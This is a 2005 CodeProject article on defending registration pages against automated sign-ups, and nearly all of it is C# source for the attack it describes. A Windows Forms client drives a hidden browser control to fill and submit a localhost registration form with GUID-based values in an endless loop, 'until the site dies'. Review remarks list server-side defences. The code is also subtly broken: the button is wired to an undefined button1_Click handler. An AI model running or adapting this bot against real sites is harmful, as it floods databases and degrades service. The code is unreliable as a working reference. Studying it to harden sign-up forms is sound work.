
Prevent attacks on your website

6 Jul 2005CPOL2 min read 80.8K   905   44  
Using a simple example, I'll explain how to stop a program from registering thousands of dummy users in your database and degrading your database and application performance.
using System;
using System.Drawing;
using System.ComponentModel;
using System.Windows.Forms;
using Microsoft.Win32;
using AxSHDocVw;
using SHDocVw;

namespace Test
{
	/// <summary>
	/// Demonstration client for the article: a Windows Forms window that hosts a
	/// hidden AxWebBrowser control, loads a registration page into it and contains a
	/// handler that fills in and submits that page's form in an endless loop.
	/// It illustrates the automated sign-up traffic that a registration page has to
	/// be able to withstand.
	/// </summary>
	public class Form1 : System.Windows.Forms.Form
	{
		// ActiveX browser control that holds the registration page; the designer code sets Visible = false.
		private AxSHDocVw.AxWebBrowser WebBrowser1;
		// The only visible control on the form.
		private System.Windows.Forms.Button btnStart;
		/// <summary>
		/// Required designer variable.
		/// </summary>
		private System.ComponentModel.Container components = null;

		/// <summary>
		/// Creates the form and builds its controls through InitializeComponent.
		/// </summary>
		public Form1()
		{
			//
			// Required for Windows Form Designer support
			//
			InitializeComponent();

			//
			// TODO: Add any constructor code after InitializeComponent call
			//
		}

		/// <summary>
		/// Clean up any resources being used.
		/// </summary>
		/// <param name="disposing">True when called from an explicit Dispose; only then is the components container disposed.</param>
		protected override void Dispose( bool disposing )
		{
			if( disposing )
			{
				if (components != null) 
				{
					components.Dispose();
				}
			}
			base.Dispose( disposing );
		}

		#region Windows Form Designer generated code
		/// <summary>
		/// Required method for Designer support - do not modify
		/// the contents of this method with the code editor.
		/// </summary>
		private void InitializeComponent()
		{
			System.Resources.ResourceManager resources = new System.Resources.ResourceManager(typeof(Form1));
			this.WebBrowser1 = new AxSHDocVw.AxWebBrowser();
			this.btnStart = new System.Windows.Forms.Button();
			((System.ComponentModel.ISupportInitialize)(this.WebBrowser1)).BeginInit();
			this.SuspendLayout();
			// 
			// WebBrowser1
			// 
			this.WebBrowser1.Enabled = true;
			this.WebBrowser1.Location = new System.Drawing.Point(8, 8);
			this.WebBrowser1.OcxState = ((System.Windows.Forms.AxHost.State)(resources.GetObject("WebBrowser1.OcxState")));
			this.WebBrowser1.Size = new System.Drawing.Size(8, 8);
			this.WebBrowser1.TabIndex = 0;
			// The browser is kept invisible: the page is loaded and scripted without being shown.
			this.WebBrowser1.Visible = false;
			// 
			// btnStart
			// 
			this.btnStart.Location = new System.Drawing.Point(64, 40);
			this.btnStart.Name = "btnStart";
			this.btnStart.Size = new System.Drawing.Size(128, 23);
			this.btnStart.TabIndex = 1;
			this.btnStart.Text = "Start Registring";
			this.btnStart.Click += new System.EventHandler(this.button1_Click);
			// 
			// Form1
			// 
			this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
			this.ClientSize = new System.Drawing.Size(264, 93);
			this.Controls.Add(this.btnStart);
			this.Controls.Add(this.WebBrowser1);
			this.Name = "Form1";
			this.Text = "Form1";
			this.Load += new System.EventHandler(this.Form1_Load);
			((System.ComponentModel.ISupportInitialize)(this.WebBrowser1)).EndInit();
			this.ResumeLayout(false);

		}
		#endregion

		/// <summary>
		/// The main entry point for the application.
		/// </summary>
		[STAThread]
		static void Main() 
		{
			Application.Run(new Form1());
		}

		/// <summary>
		/// Load handler: points the hidden browser control at the registration page.
		/// </summary>
		/// <param name="sender">Event source; not used.</param>
		/// <param name="e">Event data; not used.</param>
		private void Form1_Load(object sender, System.EventArgs e)
		{
		
			// get the registration page URL
			// (hard-coded to a test application on localhost, reached over plain HTTP)
			string url="http://localhost:8181/TestApplication1/Registration.aspx";
			// the same null reference is passed for all four remaining by-ref arguments of Navigate
			Object o = null;
			// fetch the page into the web browser control.
			WebBrowser1.Navigate(url, ref o, ref o, ref o, ref o);
		
		}
			
			
			
	

		/// <summary>
		/// Click handler that repeatedly fills the registration form loaded in
		/// WebBrowser1 with values cut from a fresh GUID and clicks the page's submit button.
		/// </summary>
		/// <param name="sender">Event source; not used.</param>
		/// <param name="e">Event data; not used.</param>
		/// <remarks>
		/// NOTE(review), defender's reading: each pass submits the form through a real
		/// browser control, so the posts presumably look like ordinary form submissions.
		/// A registration page resists this pattern with server-side controls such as a
		/// human-verification challenge on the form, limits on sign-ups per client or
		/// address, a confirmation step before an account becomes active, and alerting
		/// on bursts of new accounts. Accounts created this way carry user ids and names
		/// made of hexadecimal digits and hyphens, which is a usable clean-up and
		/// detection signal.
		/// </remarks>
		private void btnRegisterClick_Click(object sender, System.EventArgs e)
		{
			
			// use the HTMLDocument interface of mshtml to simulate the registration process
			mshtml.HTMLDocument obj;
			// only password gets an initial value here; the other four are assigned inside the loop
			string tempGuid,userId,firstName,LastName,password=string.Empty;
			// execute an infinite loop: there is no break or return, so the handler never returns
			while(true)
			{
				
				try
				{
					// get the random values for this user:
					// every field is a slice of the same GUID string, so the values overlap
					// and consist only of hex digits and hyphens
					tempGuid=System.Guid.NewGuid().ToString();
					userId=tempGuid.Substring(0,9);
					firstName=tempGuid.Substring(3,12);
					LastName=tempGuid.Substring(11,10);
					password=tempGuid.Substring(10,8);

					// assign the values to the form fields.
					// the element ids below are those of the article's sample registration page
					obj=(mshtml.HTMLDocument)WebBrowser1.Document;
					obj.getElementById("txtUserId").innerText=userId;
					obj.getElementById("txtFirstName").innerText=firstName;
					obj.getElementById("txtLastName").innerText=LastName;
					obj.getElementById("txtPassword").innerText=password;
					obj.getElementById("txtConfirmPassword").innerText=password;
				       
					// find the submit button to post the information to the website
					// execute the click of the submit button to post the information
					obj.getElementById("btnSubmit").click();
					// Note if you can't find the submit button by id then use the following approach
					// find it by index in the entire HTMLDocument
					/*
					 mshtml.HTMLInputElement objbut;
					 objbut=(mshtml.HTMLInputElement)obj.all.item("submit",0);
					 objbut.click();
					*/
				}
				catch
				{
					// failed :(
					// no problem we'll try again (try, try until the site dies ..)
					// NOTE(review): the bare catch discards every exception, so a failed pass
					// is neither reported nor counted and the loop simply continues.
				}
				
			}
			
		}
	}
}


License

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)


Written By
Architect
India India
Its me Smile | :)
